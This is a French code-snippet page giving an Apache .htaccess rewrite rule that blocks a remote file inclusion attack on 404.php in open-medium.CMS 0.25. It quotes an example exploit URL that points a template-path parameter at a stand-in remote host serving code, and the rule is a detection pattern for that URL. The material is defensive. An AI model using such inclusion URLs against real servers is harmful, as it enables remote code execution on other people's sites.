Protection contre le hack avec 404.php
Information sur le code source
Enregistré le 09 Juin 2008 - Vu 4211 fois
| Votre avis: |
|
| |
[66] sources en Apache voir
|
Description du code source
Informations sur le code source
Le script se trouve peut-être sur votre site géré par open-medium.CMS en version 0.25. La faille touche les sites dont le paramètre register_globals est à on. Une petite règle dans le fichier .htaccess permet de renvoyer un code retour 403.
Les url concernées sont de la forme :
http://www.example.com/404.php?REDSYS[MYPATH][TEMPLATES]=http://sitepourri.com/page.txt?
La meilleur protection reste de mettre register globals à off.
Code Source
.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
|
|
################################################################################
# #
# __ _ __ _ #
# __ ______/ /______ _ ______(_) /_(_)__ ___ _ #
# / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/ #
# \_,_/_/ /_/_/ \__/|__,__/_/ /_/\__/_/_//_/\_, / #
# /___/ #
# #
# #
################################################################################
# #
# Titre : Protection contre le hack avec 404.php #
# #
# URL : /scripts57-Apache.htm #
# Auteur : admin #
# Date édition : 09 Juin 2008 #
# #
################################################################################
RewriteCond %{QUERY_STRING} ^(.*&)?REDSYS\[MYPATH\]\[TEMPLATES\]=http://
RewriteRule ^(.+/)?404\.php$ - [F,L]
|
Librairie
Langages de programmation
La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets.
Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP..
Plus de 300 références facilement accessibles. Visiter